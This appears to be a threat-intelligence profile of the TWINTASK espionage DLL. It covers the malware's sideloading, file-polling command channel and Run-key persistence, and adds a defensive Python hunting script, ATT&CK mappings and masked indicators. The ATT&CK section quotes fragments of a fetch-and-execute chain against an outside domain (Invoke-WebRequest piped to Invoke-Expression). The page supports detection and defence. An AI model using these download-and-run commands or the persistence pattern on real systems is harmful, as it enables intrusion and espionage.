Malware. Used by 1 actor.

TWINTASK

TWINTASK is a malicious DLL, observed as libvlc.dll, used in a January 2026 campaign targeting Iraqi government officials and attributed with medium-to-high confidence by Zscaler ThreatLabz to the suspected Iran-nexus actor Dust Specter. It was delivered by the SPLITDROP .NET dropper in a password-protected RAR archive impersonating Iraq’s Ministry of Foreign Affairs, then sideloaded by a legitimate VLC executable.

TWINTASK functions as a worker component in a two-part malware architecture, with TWINTALK as the command-and-control orchestrator. It polls C:\ProgramData\PolGuid\in.txt every 15 seconds for Base64-encoded PowerShell commands, decodes and executes them, and writes output and errors to C:\ProgramData\PolGuid\out.txt. It also launches WingetUI.exe to sideload the TWINTALK DLL (hostfxr.dll). Persistence is established through Windows Registry Run keys that relaunch VLC.exe and WingetUI.exe after reboot.

The malware was used in targeted espionage activity against Iraqi government personnel; associated malware in the same campaign included SPLITDROP, TWINTALK, and GHOSTFORM. High-confidence file and path indicators mentioned in the reporting include libvlc.dll, C:\ProgramData\PolGuid\in.txt, C:\ProgramData\PolGuid\out.txt, C:\ProgramData\PolGuid\VLC\VLC.exe, and C:\ProgramData\PolGuid\WingetUI\WingetUI.exe.
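A defender-side hunt for the behaviour chain described above, added here as an example (not Mallory's, Zscaler's or Centripetal's code). It scores constructed Sysmon-style events for the three observable traits named in the reporting: a Run key pointing into C:\ProgramData\PolGuid, writes to the in.txt/out.txt task files, and VLC.exe launching WingetUI.exe from that directory. The event field names and the "Updater" Run value name are assumptions; a host showing two or more distinct traits is reported.

```python
"""Hunt the TWINTASK file-polling/sideloading chain in endpoint telemetry (added example)."""
import re
from collections import defaultdict

# Staging directory named in the reporting; compared case-insensitively.
POLGUID = re.compile(r"(?i)^c:\\programdata\\polguid\\")
TASK_FILES = {"in.txt", "out.txt"}            # command / result files
SIDELOAD_HOSTS = {"vlc.exe", "wingetui.exe"}  # legitimate sideload hosts

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

# Constructed sample events (not a real capture); field names and the
# "Updater" Run value name are assumptions.
EVENTS = [
    {"host": "ws01", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\ProgramData\PolGuid\VLC\VLC.exe"},
    {"host": "ws01", "type": "file", "image": r"C:\ProgramData\PolGuid\VLC\VLC.exe",
     "target": r"C:\ProgramData\PolGuid\out.txt"},
    {"host": "ws01", "type": "process", "parent": r"C:\ProgramData\PolGuid\VLC\VLC.exe",
     "image": r"C:\ProgramData\PolGuid\WingetUI\WingetUI.exe"},
    {"host": "ws01", "type": "registry", "value": r"C:\ProgramData\PolGuid\WingetUI\WingetUI.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"host": "ws02", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\VideoLAN\VLC\vlc.exe"},  # benign install, no match
]

def classify(ev):
    """Return the matched TWINTASK behaviour name, or None for benign events."""
    if ev["type"] == "registry":
        if "\\run\\" in ev["key"].lower() and POLGUID.match(ev["value"]):
            return "run_key_polguid"
    elif ev["type"] == "file":
        if POLGUID.match(ev["target"]) and basename(ev["target"]) in TASK_FILES:
            return "task_file_io"
    elif ev["type"] == "process":
        if POLGUID.match(ev["image"]) and basename(ev["image"]) in SIDELOAD_HOSTS:
            if basename(ev["parent"]) == "vlc.exe":
                return "vlc_spawns_wingetui"
            return "sideload_host_in_polguid"
    return None

def hunt(events):
    """Per host, the distinct behaviours seen; two or more together is an alert."""
    hits = defaultdict(set)
    for ev in events:
        name = classify(ev)
        if name:
            hits[ev["host"]].add(name)
    return {h: sorted(n) for h, n in hits.items() if len(n) >= 2}
```

Requiring two traits on the same host keeps a lone VLC or WingetUI install from alerting while still catching the staging directory, the task files and the Run key together.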


THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers.

Dust Specter

It subsequently extracts and launches VLC.exe, which sideloads a malicious libvlc.dll identified as TWINTASK. TWINTASK maintains persistence by polling C:\ProgramData\PolGuid\in.txt every 15 seconds for Base64-encoded PowerShell commands.

via Centripetal threat research (centripetal.ai)
MITRE ATT&CK

Techniques & procedures

10 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566 Phishing (evidence: 3)

Initial access continued to rely on spear phishing — delivering macro-enabled documents or malicious links.

T1566.001 Spearphishing Attachment (evidence: 1)

Initial access continued to rely on spear phishing — delivering macro-enabled documents or malicious links.

Execution

5 techniques
T1053 Scheduled Task/Job (evidence: 1)

Persistence was maintained through web shells and scheduled tasks.

T1059 Command and Scripting Interpreter (evidence: 2)

Attack Chain 2 delivered GHOSTFORM, consolidating all functionality into a single binary using an invisible Windows form for delayed execution, in-memory PowerShell command execution

T1059.001 PowerShell (evidence: 7)

TWINTASK maintains persistence by polling C:\ProgramData\PolGuid\in.txt every 15 seconds for Base64-encoded PowerShell commands.

T1204 User Execution (evidence: 3)

In recent years, Iranian-linked threat actors have commonly used phishing (T1566) as the primary vector for initial access, often leading to execution via user execution (T1204) of malicious files

T1574.001 DLL Sideloading (evidence: 2)

"...uses DLL sideloading with legitimate software such as VLC and WingetUI."

Persistence

2 techniques
T1053 Scheduled Task/Job (evidence: 1)

Persistence was maintained through web shells and scheduled tasks.

T1547.001 Registry Run Keys / Startup Folder (evidence: 6)

Attack Chain 1 used SPLITDROP, a .NET dropper delivering TWINTASK and TWINTALK via DLL sideloading into legitimate VLC.exe and WingetUI.exe processes, establishing file-based command polling through in.txt and out.txt with persistence via Windows Run registry keys.

Privilege Escalation

2 techniques
T1053 Scheduled Task/Job (evidence: 1)

Persistence was maintained through web shells and scheduled tasks.

T1547.001 Registry Run Keys / Startup Folder (evidence: 6)

Attack Chain 1 used SPLITDROP, a .NET dropper delivering TWINTASK and TWINTALK via DLL sideloading into legitimate VLC.exe and WingetUI.exe processes, establishing file-based command polling through in.txt and out.txt with persistence via Windows Run registry keys.

Stealth

2 techniques
T1036 Masquerading (evidence: 2)

“Defense evasion … masquerading (T1036)” and examples include “C# malware masquerading as PDF documents,” “fake 404 error pages,” and impersonation of collaboration platforms.

T1574.001 DLL Sideloading (evidence: 2)

"...uses DLL sideloading with legitimate software such as VLC and WingetUI."

Command and Control

1 technique
T1105 Ingress Tool Transfer (evidence: 2)

“Add-Type … HttpClient … GetAsync('https://meetingapp.site/webexdownload') … WriteAllBytes” / “Invoke-WebRequest … .content | Invoke-Expression”

INDICATORS OF COMPROMISE

IOCs tracked for this family

5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Network: 4 tracked. IPs, domains, and DNS infrastructure linked to this family.

Other: 1 tracked. Other indicator types observed in public reporting.

Type and latest sighting (indicator values are masked on this page):

domain, last seen 3 months ago
domain, last seen 3 months ago
domain, last seen 3 months ago
domain, last seen 3 months ago
uri, last seen 4 months ago